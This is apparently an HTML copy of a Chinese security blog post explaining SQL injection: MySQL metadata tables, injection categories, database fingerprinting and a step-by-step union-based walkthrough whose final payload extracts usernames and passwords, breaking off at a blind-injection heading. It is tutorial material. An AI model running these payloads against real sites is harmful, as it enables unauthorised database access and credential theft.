-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path9958bd672d7e.html
296 lines (271 loc) · 35.4 KB
/
9958bd672d7e.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>SQL注入漏洞 | BaiKer</title><meta name="keywords" content="注入漏洞"><meta name="author" content="BaiKer"><meta name="copyright" content="BaiKer"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="SQL注入漏洞简介 SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入漏洞">
<meta property="og:url" content="http://baiker.top/9958bd672d7e.html">
<meta property="og:site_name" content="BaiKer">
<meta property="og:description" content="SQL注入漏洞简介 SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://inews.gtimg.com/newsapp_ls/0/13902527518/0">
<meta property="article:published_time" content="2021-07-23T05:29:10.000Z">
<meta property="article:modified_time" content="2022-05-26T07:28:40.667Z">
<meta property="article:author" content="BaiKer">
<meta property="article:tag" content="注入漏洞">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://inews.gtimg.com/newsapp_ls/0/13902527518/0"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://baiker.top/9958bd672d7e"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: 'SQL注入漏洞',
isPost: true,
isHome: false,
isHighlightShrink: false,
isToc: true,
postUpdate: '2022-05-26 15:28:40'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
win.saveToLocal = {
set: function setWithExpiry(key, value, ttl) {
if (ttl === 0) return
const now = new Date()
const expiryDay = ttl * 86400000
const item = {
value: value,
expiry: now.getTime() + expiryDay,
}
localStorage.setItem(key, JSON.stringify(item))
},
get: function getWithExpiry(key) {
const itemStr = localStorage.getItem(key)
if (!itemStr) {
return undefined
}
const item = JSON.parse(itemStr)
const now = new Date()
if (now.getTime() > item.expiry) {
localStorage.removeItem(key)
return undefined
}
return item.value
}
}
win.getScript = url => new Promise((resolve, reject) => {
const script = document.createElement('script')
script.src = url
script.async = true
script.onerror = reject
script.onload = script.onreadystatechange = function() {
const loadState = this.readyState
if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
script.onload = script.onreadystatechange = null
resolve()
}
document.head.appendChild(script)
})
win.activateDarkMode = function () {
document.documentElement.setAttribute('data-theme', 'dark')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
}
}
win.activateLightMode = function () {
document.documentElement.setAttribute('data-theme', 'light')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
}
}
const t = saveToLocal.get('theme')
if (t === 'dark') activateDarkMode()
else if (t === 'light') activateLightMode()
const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
if (asideStatus === 'hide') {
document.documentElement.classList.add('hide-aside')
} else {
document.documentElement.classList.remove('hide-aside')
}
}
const detectApple = () => {
if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
document.documentElement.classList.add('apple')
}
}
detectApple()
})(window)</script><meta name="referrer" content="no-referrer" /><link rel="stylesheet" href="https://baiker.top/css/essay.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.css"/><meta name="generator" content="Hexo 5.4.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902527518/0')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BaiKer</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">SQL注入漏洞</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-07-23T05:29:10.000Z" title="发表于 2021-07-23 13:29:10">2021-07-23</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-05-26T07:28:40.667Z" title="更新于 2022-05-26 15:28:40">2022-05-26</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/">常规漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/SQL%E6%B3%A8%E5%85%A5/">SQL注入</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">1.7k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>5分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="SQL注入漏洞"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h2 id="SQL注入漏洞简介"><a href="#SQL注入漏洞简介" class="headerlink" title="SQL注入漏洞简介"></a>SQL注入漏洞简介</h2><p> SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。</p>
<h3 id="SQL注入原理"><a href="#SQL注入原理" class="headerlink" title="SQL注入原理"></a>SQL注入原理</h3><p>一段MySQL查询数据为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where user_id = '1'</span><br></pre></td></tr></table></figure>
<p>这一段代码的意思是,查询<code>user</code>表中<code>user_id</code>字段的值为1的所有数据</p>
<p>其中1是我们可以改变的地方,在不做任何防御措施下,我们将其改成我们构造的语句,从而造成SQL注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where user_id = '1' or 1 = 1 --+</span><br></pre></td></tr></table></figure>
<p>改变之后,这段代码的意思就变成了查询<code>user</code>表中<code>user_id</code>字段的值为1或者<code>1=1</code>的所有数据</p>
<p>由于<code>1=1</code>的结果为真,所以最后的结果就是查询<code>user</code>表中的所有数据</p>
<p>这里我们手动填写的语句就是<code>1' or 1 = 1 --+</code></p>
<p>其中<code>1'</code>闭合之前的语句,在通过<code>or 1 = 1</code>造成结果为真的判断</p>
<p>再通过注释符号<code>--</code>注释掉代码后边可能存在的其他语句,避免查询的结果与我们预期的结果不同</p>
<p>最后通过符号<code>+</code>来表示空格,避免注释符号<code>--</code>与之后的单引号连接导致出错,这样一段SQL注入就产生了</p>
<p><strong>在MySQL5.0以下</strong>,没有information_schema这个系统表,无法列表名等,只能暴力跑表名。</p>
<p><strong>在MySQL5.0以上</strong>,MySQL中默认添加了一个名为 information_schema 的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。</p>
<p><strong>information_schema数据库中三个很重要的表:</strong></p>
<p><strong>information_schema.schemata</strong>: 该数据表存储了mysql数据库中的所有数据库的库名</p>
<p><strong>information_schema.tables</strong>: 该数据表存储了mysql数据库中的所有数据表的表名</p>
<p><strong>information_schema.columns</strong>: 该数据表存储了mysql数据库中的所有列的列名</p>
<h3 id="SQL注入特征"><a href="#SQL注入特征" class="headerlink" title="SQL注入特征"></a>SQL注入特征</h3><p><strong>任何传输参数的地方都有可能造成SQL注入</strong></p>
<p><strong>任何传输参数的地方都有可能造成SQL注入</strong></p>
<p><strong>任何传输参数的地方都有可能造成SQL注入</strong></p>
<h3 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h3><ul>
<li>database():当前数据库</li>
<li>user():查询数据库的用户</li>
<li>version():查询数据库版本</li>
<li>system_user():系统用户名</li>
<li>session_user():链接数据库的用户名</li>
<li>current_user:当前用户名</li>
<li>load_file():读取本地文件</li>
<li>@@datadir:读取数据库路径</li>
<li>@@basedir:MySQL安装路径</li>
<li>@@version_complie_os:查看操作系统</li>
</ul>
<h3 id="SQL注入的分类"><a href="#SQL注入的分类" class="headerlink" title="SQL注入的分类"></a>SQL注入的分类</h3><p><strong>依据注入点类型分类</strong></p>
<ul>
<li>数字类型的注入</li>
<li>字符类型的注入</li>
<li>搜索类型的注入</li>
</ul>
<p><strong>依据提交方式分类</strong></p>
<ul>
<li>GET注入</li>
<li>POST注入</li>
<li>COOKIE注入</li>
<li>HTTP头注入(XFF注入、UA注入、REFERER注入)</li>
</ul>
<p><strong>依据获取信息的方式分类</strong></p>
<ul>
<li>基于布尔的盲注</li>
<li>基于时间的盲注</li>
<li>基于报错的盲注</li>
<li>联合查询注入</li>
<li>堆查询注入(可同时执行多条语句)</li>
</ul>
<h3 id="判断数据库类型"><a href="#判断数据库类型" class="headerlink" title="判断数据库类型"></a>判断数据库类型</h3><table>
<thead>
<tr>
<th align="center">数据库</th>
<th align="center">指纹</th>
</tr>
</thead>
<tbody><tr>
<td align="center">MySQL</td>
<td align="center">information_schema.tables</td>
</tr>
<tr>
<td align="center">Access</td>
<td align="center">msysobjects</td>
</tr>
<tr>
<td align="center">SQL server</td>
<td align="center">sysobjects</td>
</tr>
<tr>
<td align="center">Oracle</td>
<td align="center">dual</td>
</tr>
</tbody></table>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">//判断MySQL数据库</span><br><span class="line">xxx?id=1 and exists(select * from information_schema.tables) --+</span><br><span class="line"> </span><br><span class="line">//判断Access数据库 </span><br><span class="line">xxx?id=1 and exists(select * from msysobjects) --+</span><br><span class="line"></span><br><span class="line">//判断Mssql数据库</span><br><span class="line">xxx?id=1 and exists(select * from sysobjects) --+</span><br><span class="line"> </span><br><span class="line">//判断Oracle数据库</span><br><span class="line">xxx?id=1 and (select count(*) from dual)>0 --+</span><br></pre></td></tr></table></figure>
<h2 id="Union联合查询注入"><a href="#Union联合查询注入" class="headerlink" title="Union联合查询注入"></a>Union联合查询注入</h2><h3 id="判断闭合符号"><a href="#判断闭合符号" class="headerlink" title="判断闭合符号"></a>判断闭合符号</h3><p>当我们找到一个注入点时,首先判断该注入点中可能存在的闭合符号</p>
<p>无闭合,单引号<code>''</code>,双引号<code>""</code>,括号<code>()</code>,单引号+括号<code>('')</code>,双引号+括号<code>("")</code>….以及<code>引号+多括号</code>组合</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1</span><br><span class="line">如果报错说明可能存在注入</span><br><span class="line"></span><br><span class="line">xxx?id = 1 and 1 = 2 --+</span><br><span class="line">如果不报错,说明不是数字型注入</span><br><span class="line"></span><br><span class="line">xxx?id = 1’ and 1 = 2 --+</span><br><span class="line">如果报错,说明闭合含有单引号,如果不报错,说明闭合含有双引号</span><br><span class="line">然后通过构造语句能否成功执行判断具体的闭合组合情况</span><br></pre></td></tr></table></figure>
<h3 id="判断字段数量"><a href="#判断字段数量" class="headerlink" title="判断字段数量"></a>判断字段数量</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = 1' order by 5 --+</span><br></pre></td></tr></table></figure>
<p>通过语句<code>order by x</code>来判断字段的数量</p>
<p>如果不报错,说明字段数量大于等于5,如果报错,说明字段数量小于5</p>
<h3 id="判断数据显示位置"><a href="#判断数据显示位置" class="headerlink" title="判断数据显示位置"></a>判断数据显示位置</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,2,3,4... --+ </span><br></pre></td></tr></table></figure>
<p>这里先通过负号<code>-</code>或者<code>and 1 = 2</code>使得数据库报错</p>
<p>再通过<code>union</code>建立联合查询,也就是在<code>select</code>查询里面再嵌套一个查询语句</p>
<p>后面的数值排列取决于判断的字段数量</p>
<p>若回显中出现了相应的数值说明我们接下来查询的信息会在该位置显示</p>
<p>如图下的2和3可能会在网页中显现出来</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsqxkgro2qj60o804iabv02.jpg" alt="SQL注入1.png"></p>
<h3 id="查询数据库库名"><a href="#查询数据库库名" class="headerlink" title="查询数据库库名"></a>查询数据库库名</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,database(),3 --+</span><br></pre></td></tr></table></figure>
<p><code>database()</code>是MySQL中的一个函数,表示当前数据库的名字</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsqxw3ux3yj60ps04ggnl02.jpg" alt="SQL注入2.png"></p>
<h3 id="枚举数据库中的所有的表"><a href="#枚举数据库中的所有的表" class="headerlink" title="枚举数据库中的所有的表"></a>枚举数据库中的所有的表</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() --+</span><br></pre></td></tr></table></figure>
<p>这个语句的意思是从<code>information_schema</code>的<code>table-schema</code>表中查找当前数据库的所有表</p>
<p><code>information_schema</code>:MySQL的默认数据库,包含了所有数据库,数据表的信息</p>
<p><code>table_schema</code>:默认数据库中的一个表,记录了数据库名字</p>
<p><code>table_name</code>:默认数据库中的一个表,记录了数据表的名字</p>
<p><code>group_concat()</code>:是MySQL的函数,把函数中字段的值输出在一行中,以逗号分隔</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsqyv8akyuj60xj04qgp102.jpg" alt="SQL注入3.png"></p>
<h3 id="枚举数据表中所有的字段"><a href="#枚举数据表中所有的字段" class="headerlink" title="枚举数据表中所有的字段"></a>枚举数据表中所有的字段</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = databese() and table_name = 'user' --+</span><br></pre></td></tr></table></figure>
<p>这个语句的意思是从<code>information_schema</code>中条件为当前数据表并且当前数据库中的<code>user</code>表中所有字段的名字</p>
<p><code>column_name</code>:MySQL的默认数据库中的一个表,记录了字段的名字</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsqyvpxte8j60xg04qq6p02.jpg" alt="SQL注入4.png"></p>
<h3 id="查询字段中所有的值"><a href="#查询字段中所有的值" class="headerlink" title="查询字段中所有的值"></a>查询字段中所有的值</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx?id = -1' union select 1,group_concat(concat_ws(0x2d,username,password)),3 from user --+</span><br></pre></td></tr></table></figure>
<p>这个语句的意思是查询<code>user</code>表中<code>username</code>字段和<code>password</code>的值</p>
<p><code>concat_ws</code>:MySQL的函数,为了格式化数据,看起来整齐,通过第一个参数连接后面所有参数</p>
<p><code>0x2d</code>:ASCII码,代表<code>-</code></p>
<p>最后输出格式为<code>user1-pass1</code>,<code>user2-pass2</code>…..</p>
<h2 id="Boolean盲注"><a href="#Boolean盲注" class="headerlink" title="Boolean盲注"></a>Boolean盲注</h2><p>盲注,通常是在服务器没有回显错误信息,所以攻击者找到验证注入的SQL语句是否执行的方法</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">BaiKer</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://baiker.top/9958bd672d7e.html">http://baiker.top/9958bd672d7e.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://baiker.top" target="_blank">BaiKer</a>!</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/">注入漏洞</a></div><div class="post_share"><div class="social-share" data-image="https://inews.gtimg.com/newsapp_ls/0/13902527518/0" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/b5e4a9195b88.html"><img class="prev-cover" src="https://inews.gtimg.com/newsapp_ls/0/13902390411/0" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Openssh命令注入漏洞(CVE-2020-15778)</div></div></a></div><div class="next-post pull-right"><a href="/3609c62142b6.html"><img class="next-cover" src="https://inews.gtimg.com/newsapp_ls/0/13902527425/0" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Shiro反序列化 - shiro 550 - CVE-2016-4437</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/73208a942d69.html" title="JBoss seam2模板注入漏洞 - CVE-2010-1871"><img class="cover" src="https://baiker.top/img/wallhaven-gj977q.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-09-01</div><div class="title">JBoss seam2模板注入漏洞 - CVE-2010-1871</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/avatar.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">BaiKer</div><div class="author-info__description">网络安全</div></div><div class="card-info-data is-center"><div class="card-info-data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="card-info-data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="card-info-data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/baiker" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="/baiker@qq.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">SQL注入漏洞简介</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">SQL注入原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%89%B9%E5%BE%81"><span class="toc-number">1.2.</span> <span class="toc-text">SQL注入特征</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E7%94%A8%E5%87%BD%E6%95%B0"><span class="toc-number">1.3.</span> <span class="toc-text">常用函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%88%86%E7%B1%BB"><span class="toc-number">1.4.</span> <span class="toc-text">SQL注入的分类</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B"><span class="toc-number">1.5.</span> <span class="toc-text">判断数据库类型</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Union%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2%E6%B3%A8%E5%85%A5"><span class="toc-number">2.</span> <span class="toc-text">Union联合查询注入</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E9%97%AD%E5%90%88%E7%AC%A6%E5%8F%B7"><span class="toc-number">2.1.</span> <span class="toc-text">判断闭合符号</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E5%AD%97%E6%AE%B5%E6%95%B0%E9%87%8F"><span class="toc-number">2.2.</span> <span class="toc-text">判断字段数量</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A4%E6%96%AD%E6%95%B0%E6%8D%AE%E6%98%BE%E7%A4%BA%E4%BD%8D%E7%BD%AE"><span class="toc-number">2.3.</span> <span class="toc-text">判断数据显示位置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E8%AF%A2%E6%95%B0%E6%8D%AE%E5%BA%93%E5%BA%93%E5%90%8D"><span class="toc-number">2.4.</span> <span class="toc-text">查询数据库库名</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%9A%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E4%B8%AD%E7%9A%84%E6%89%80%E6%9C%89%E7%9A%84%E8%A1%A8"><span class="toc-number">2.5.</span> <span class="toc-text">枚举数据库中的所有的表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%9A%E4%B8%BE%E6%95%B0%E6%8D%AE%E8%A1%A8%E4%B8%AD%E6%89%80%E6%9C%89%E7%9A%84%E5%AD%97%E6%AE%B5"><span class="toc-number">2.6.</span> <span class="toc-text">枚举数据表中所有的字段</span></a></li><li class="toc-item toc-level-3"><a 